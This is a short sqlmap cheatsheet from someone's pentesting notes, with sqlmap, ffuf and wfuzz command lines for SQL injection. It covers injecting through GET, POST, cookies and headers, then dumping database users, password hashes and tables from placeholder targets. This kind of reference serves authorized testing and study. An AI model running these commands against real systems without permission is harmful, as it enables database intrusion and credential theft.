Skip to content

SQLmap Cheatsheet

Info

This note is still in development.

Generic Arguments

-u "<URL>" 
-p "<PARAM TO TEST>" 
--user-agent=SQLMAP 
--random-agent 
--threads=10 
--risk=3 #MAX
--level=5 #MAX
--dbms="<KNOWN DB TECH>" 
--os="<OS>"
--technique="UB" #Use only techniques UNION and BLIND in that order (default "BEUSTQ")
--batch #Non interactive mode, usually Sqlmap will ask you questions, this accepts the default answers
--auth-type="<AUTH>" #HTTP authentication type (Basic, Digest, NTLM or PKI)
--auth-cred="<AUTH>" #HTTP authentication credentials (name:password)
--proxy=http://127.0.0.1:8080
--union-char "GsFRts2" #Help sqlmap identify union SQLi techniques with a weird union char

Retrieve Information

  • Internal

    --current-user #Get current user
--is-dba #Check if current user is Admin
--hostname #Get hostname
--users #Get usernames od DB
--passwords #Get passwords of users in DB
--privileges #Get privileges

  • DB Data

    --all #Retrieve everything
--dump #Dump DBMS database table entries
--dbs #Names of the available databases
--tables #Tables of a database ( -D <DB NAME> )
--columns #Columns of a table ( -D <DB NAME> -T <TABLE NAME> )
-D <DB NAME> -T <TABLE NAME> -C <COLUMN NAME> #Dump column

Injection

## GET Request Injection
sqlmap -u "http://example.com/?id=1" -p id
sqlmap -u "http://example.com/?id=*" -p id

## POST Request Injection
sqlmap -u "http://example.com" --data "username=*&password=*"

# SQLmap POST Injection
sqlmap -u "http(s)://<ip_addr>:<port>/<directory>" --method POST --data "field1=*&field2=*&field3=*" -p "field3"

## Header & Othe HTTP Method Injection

# Inside cookie
sqlmap -u "http://example.com" --cookie "mycookies=*"

# Inside some header
sqlmap -u "http://example.com" --headers="x-forwarded-for:127.0.0.1*"
sqlmap -u "http://example.com" --headers="referer:*"

# PUT Method
sqlmap --method=PUT -u "http://example.com" --headers="referer:*"

#The injection is located at the '*'

Examples

# Enumeration
sudo ffuf -u http(s)://<ip_addr>:<port>/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

# Burpsuite to see fields being sent

# SQLmap POST Injection
sqlmap -u "http(s)://<ip_addr>:<port>/<directory>" --method POST --random-agent --data "field1=*&field2=*&field3=*" -p "field3"


# Fuzzing GET Parameter
wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/SQL.txt -u "$URL/index.php?id=FUZZ"

# Fuzzing POST Parameter
wfuzz -c -z file,/usr/share/wordlists/wfuzz/Injections/SQL.txt -d "id=FUZZ" -u "$URL/index.php"